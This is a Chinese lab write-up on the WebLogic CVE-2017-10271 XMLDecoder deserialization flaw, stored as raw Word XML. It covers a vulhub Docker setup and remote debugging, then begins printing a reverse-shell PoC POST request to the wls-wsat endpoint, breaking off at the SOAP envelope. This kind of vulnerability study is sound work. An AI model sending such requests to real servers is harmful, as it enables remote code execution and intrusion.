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5008B" w14:textId="20E7D75B" w:rsidR="0062788E" w:rsidRDefault="0062788E" w:rsidP="00782998">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>weblogic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反序列化漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>VE-2017-10271</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析与复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7A5F15" w14:textId="60E244A3" w:rsidR="0062788E" w:rsidRDefault="0062788E" w:rsidP="0062788E">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>介绍</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEB70B9" w14:textId="77777777" w:rsidR="0062788E" w:rsidRDefault="0062788E" w:rsidP="0062788E">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0062788E">
        <w:t>CVE-2017-10271</w:t>
      </w:r>
      <w:r w:rsidRPr="0062788E">
        <w:t>漏洞主要是由</w:t>
      </w:r>
      <w:r w:rsidRPr="0062788E">
        <w:t>WebLogic Server WLS</w:t>
      </w:r>
      <w:r w:rsidRPr="0062788E">
        <w:t>组件远程命令执行漏洞，主要由</w:t>
      </w:r>
      <w:r w:rsidRPr="0062788E">
        <w:t>wls-wsat.war</w:t>
      </w:r>
      <w:r w:rsidRPr="0062788E">
        <w:t>触发该漏洞，触发漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="0062788E">
        <w:t>url</w:t>
      </w:r>
      <w:r w:rsidRPr="0062788E">
        <w:t>如下：</w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00B06DF3">
          <w:rPr>
            <w:rStyle w:val="af0"/>
          </w:rPr>
          <w:t>http://192.168.xx.xx:7001/wls-wsat/CoordinatorPortType</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63700E9C" w14:textId="30FC0541" w:rsidR="0062788E" w:rsidRDefault="0062788E" w:rsidP="0062788E">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>伪造</w:t>
      </w:r>
      <w:r w:rsidRPr="0062788E">
        <w:t>post</w:t>
      </w:r>
      <w:r w:rsidRPr="0062788E">
        <w:t>数据包，通过构造</w:t>
      </w:r>
      <w:r w:rsidRPr="0062788E">
        <w:t>SOAP</w:t>
      </w:r>
      <w:r w:rsidRPr="0062788E">
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="0062788E">
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="0062788E">
        <w:t>）格式的请求，在解析的过程中导致</w:t>
      </w:r>
      <w:r w:rsidRPr="0062788E">
        <w:t>XMLDecoder</w:t>
      </w:r>
      <w:r w:rsidRPr="0062788E">
        <w:t>反序列化漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6257DA99" w14:textId="77777777" w:rsidR="0062788E" w:rsidRDefault="0062788E" w:rsidP="0062788E">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0656C87A" w14:textId="24758287" w:rsidR="0062788E" w:rsidRDefault="0062788E" w:rsidP="0062788E">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:wordWrap w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322F45B6" w14:textId="5DDFD618" w:rsidR="0062788E" w:rsidRDefault="0062788E" w:rsidP="0062788E">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里就不自己安装配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>weblogic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境了，实在是太高端，不会用</w:t>
      </w:r>
      <w:r>
        <w:t>....</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D706664" w14:textId="6673969C" w:rsidR="0062788E" w:rsidRDefault="0062788E" w:rsidP="0062788E">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vulhub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现成的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>weblogic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞环境；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B65D581" w14:textId="6F1EDE10" w:rsidR="0062788E" w:rsidRDefault="0062788E" w:rsidP="0062788E">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先修改一下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，添加调试用的端口号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>453</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（随便设）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65857D7C" w14:textId="4CCC8033" w:rsidR="0062788E" w:rsidRDefault="0062788E" w:rsidP="0062788E">
      <w:pPr>
        <w:wordWrap w:val="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5EF2FA" wp14:editId="5A4D07D1">
            <wp:extent cx="5274310" cy="1145540"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="4" name="图片 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6F5B" w14:textId="5761D007" w:rsidR="0062788E" w:rsidRDefault="0062788E" w:rsidP="0062788E">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E768D4F" w14:textId="10DEA8FD" w:rsidR="0062788E" w:rsidRDefault="0062788E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7121B86F" wp14:editId="35AD713D">
            <wp:extent cx="4849713" cy="2628969"/>
            <wp:effectExtent l="0" t="0" r="825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713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65C" w14:textId="1B46ACBE" w:rsidR="0062788E" w:rsidRPr="00782998" w:rsidRDefault="0062788E" w:rsidP="00782998">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5FA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进入漏洞的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>容器中，修改一下启动项配置文件</w:t>
      </w:r>
      <w:r w:rsidR="00782998">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，在如图所示位置添加</w:t>
      </w:r>
      <w:r w:rsidR="00782998" w:rsidRPr="00782998">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5FA"/>
        </w:rPr>
        <w:t>debugFlag=</w:t>
      </w:r>
      <w:r w:rsidR="00782998" w:rsidRPr="00782998">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5FA"/>
        </w:rPr>
        <w:t>"true"</w:t>
      </w:r>
      <w:r w:rsidR="00782998">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5FA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00782998" w:rsidRPr="00782998">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5FA"/>
        </w:rPr>
        <w:t>export</w:t>
      </w:r>
      <w:r w:rsidR="00782998" w:rsidRPr="00782998">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5FA"/>
        </w:rPr>
        <w:t xml:space="preserve"> debugFlag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6029DAE6" w14:textId="5CC91820" w:rsidR="0062788E" w:rsidRDefault="00782998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13915A66" wp14:editId="1D86F09A">
            <wp:extent cx="4820303" cy="1764856"/>
            <wp:effectExtent l="0" t="0" r="0" b="698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10"/>
                    <a:srcRect t="-1" b="33254"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4822498" cy="176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5C74" w14:textId="115D6ECE" w:rsidR="00782998" w:rsidRDefault="00782998" w:rsidP="0062788E">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>接下来需要为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>idea</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加远程调试需要的文件了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48709BA5" w14:textId="61382B5B" w:rsidR="00782998" w:rsidRDefault="00782998" w:rsidP="0062788E">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还是在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里面拷贝出两个文件夹：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>modules</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00782998">
        <w:t>wlserver_10.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，所在路径为</w:t>
      </w:r>
      <w:r w:rsidRPr="00782998">
        <w:t>~/Oracle/Middleware#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0313AB" w14:textId="50A2F305" w:rsidR="0062788E" w:rsidRDefault="00782998" w:rsidP="0062788E">
      <w:pPr>
        <w:wordWrap w:val="0"/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>tar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令先压缩，再使用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cp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令复制到宿主机；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1651F7BC" w14:textId="086BAE6C" w:rsidR="00782998" w:rsidRDefault="00782998" w:rsidP="0062788E">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解压之后将两个文件夹放在同一个文件夹</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>weblogic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录下，用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>idea</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>weblogic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260F2AEB" w14:textId="3375506F" w:rsidR="00782998" w:rsidRDefault="00782998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4916ABFA" wp14:editId="2A55AA5C">
            <wp:extent cx="5274310" cy="1394460"/>
            <wp:effectExtent l="0" t="0" r="254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70F7" w14:textId="14E32F3C" w:rsidR="00782998" w:rsidRDefault="00782998" w:rsidP="0062788E">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine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后开始配置远程调试选项，</w:t>
      </w:r>
      <w:r w:rsidR="00907AF4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结合实际情况</w:t>
      </w:r>
      <w:r w:rsidR="00907AF4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>按照图中所示配置即可；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1112F577" w14:textId="1E82DC82" w:rsidR="00782998" w:rsidRDefault="00782998" w:rsidP="0062788E">
      <w:pPr>
        <w:wordWrap w:val="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522F63" wp14:editId="43B95EA8">
            <wp:extent cx="5274310" cy="668020"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="19" name="图片 1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萤幕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FDA" w14:textId="7C65D348" w:rsidR="00782998" w:rsidRPr="00782998" w:rsidRDefault="00782998" w:rsidP="0062788E">
      <w:pPr>
        <w:wordWrap w:val="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676EF5" wp14:editId="1DA21845">
            <wp:extent cx="5274310" cy="3368675"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="18" name="图片 1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250A" w14:textId="77777777" w:rsidR="00A41F96" w:rsidRDefault="00A41F96" w:rsidP="0062788E">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能需要远程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>debug</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的入口函数路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7DD855" w14:textId="77777777" w:rsidR="00A41F96" w:rsidRDefault="00A41F96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7B348F6E" wp14:editId="2A6F65E0">
            <wp:extent cx="5274310" cy="69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D7D" w14:textId="2BC28788" w:rsidR="00A41F96" w:rsidRDefault="00A41F96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0EA4000B" wp14:editId="49084926">
            <wp:extent cx="5269748" cy="118296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 rotWithShape="1">
                    <a:blip r:embed="rId15"/>
                    <a:srcRect t="-1" b="29508"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="118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42A6" w14:textId="431CCEBA" w:rsidR="0039415F" w:rsidRDefault="0039415F" w:rsidP="0062788E">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>随便下个断电，点击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>debug</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如果程序停在了断点处就说明远程调试设置成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182F9B31" w14:textId="40309B6C" w:rsidR="00320897" w:rsidRDefault="0039415F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23C766C3" wp14:editId="439C3086">
            <wp:extent cx="5274310" cy="2167890"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="20" name="图片 20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画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29F" w14:textId="1CFC33A2" w:rsidR="0062788E" w:rsidRDefault="0062788E" w:rsidP="0062788E">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12558779" w14:textId="7E883740" w:rsidR="0062788E" w:rsidRDefault="0062788E" w:rsidP="0062788E">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:wordWrap w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞分析</w:t>
      </w:r>
      <w:r w:rsidR="007F791A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB2DB42" w14:textId="4D1D77BB" w:rsidR="00320897" w:rsidRPr="00320897" w:rsidRDefault="00320897" w:rsidP="0062788E">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00320897">
        <w:t>weblogic.wsee.jaxws.workcontext</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00320897">
        <w:t>WorkContextServerTube</w:t>
      </w:r>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00320897">
        <w:t xml:space="preserve"> processRequest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法处下断点，因为我们在访问该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并发送的请求包数据中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符串是传入到了这里。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01327080" w14:textId="3FC9E715" w:rsidR="00A41F96" w:rsidRDefault="00320897" w:rsidP="0062788E">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进入远程调试模式，并用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>burpsuite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发送</w:t>
      </w:r>
      <w:r w:rsidR="00A41F96">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反弹</w:t>
      </w:r>
      <w:r w:rsidR="00A41F96">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidR="00A41F96">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00A41F96">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>poc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1F96" w14:paraId="67141312" w14:textId="77777777" w:rsidTr="001F4CDA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42D601E2" w14:textId="77777777" w:rsidR="00320897" w:rsidRDefault="00320897" w:rsidP="0062788E">
            <w:pPr>
              <w:wordWrap w:val="0"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>POST /wls-wsat/CoordinatorPortType HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2713055B" w14:textId="77777777" w:rsidR="00320897" w:rsidRDefault="00320897" w:rsidP="0062788E">
            <w:pPr>
              <w:wordWrap w:val="0"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Host: 192.168.2.134:7001</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FC14E20" w14:textId="77777777" w:rsidR="00320897" w:rsidRDefault="00320897" w:rsidP="0062788E">
            <w:pPr>
              <w:wordWrap w:val="0"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55DEE1D6" w14:textId="77777777" w:rsidR="00320897" w:rsidRDefault="00320897" w:rsidP="0062788E">
            <w:pPr>
              <w:wordWrap w:val="0"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="628AC221" w14:textId="77777777" w:rsidR="00320897" w:rsidRDefault="00320897" w:rsidP="0062788E">
            <w:pPr>
              <w:wordWrap w:val="0"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="004661B4" w14:textId="77777777" w:rsidR="00320897" w:rsidRDefault="00320897" w:rsidP="0062788E">
            <w:pPr>
              <w:wordWrap w:val="0"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Accept-Encoding: gzip, deflate</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="271EF795" w14:textId="77777777" w:rsidR="00320897" w:rsidRDefault="00320897" w:rsidP="0062788E">
            <w:pPr>
              <w:wordWrap w:val="0"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Connection: close</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A0CC3A7" w14:textId="77777777" w:rsidR="00320897" w:rsidRDefault="00320897" w:rsidP="0062788E">
            <w:pPr>
              <w:wordWrap w:val="0"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Upgrade-Insecure-Requests: 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06BAD28F" w14:textId="77777777" w:rsidR="00320897" w:rsidRDefault="00320897" w:rsidP="0062788E">
            <w:pPr>
              <w:wordWrap w:val="0"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Cache-Control: max-age=0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="482C7936" w14:textId="77777777" w:rsidR="00320897" w:rsidRDefault="00320897" w:rsidP="0062788E">
            <w:pPr>
              <w:wordWrap w:val="0"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Content-Type: text/xml</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D32EE79" w14:textId="77777777" w:rsidR="00320897" w:rsidRDefault="00320897" w:rsidP="0062788E">
            <w:pPr>
              <w:wordWrap w:val="0"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Content-Length: 641</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55F37A56" w14:textId="77777777" w:rsidR="00320897" w:rsidRDefault="00320897" w:rsidP="0062788E">
            <w:pPr>
              <w:wordWrap w:val="0"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="78A9221C" w14:textId="77777777" w:rsidR="00320897" w:rsidRDefault="00320897" w:rsidP="0062788E">
            <w:pPr>
              <w:wordWrap w:val="0"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"&gt;</w:t>
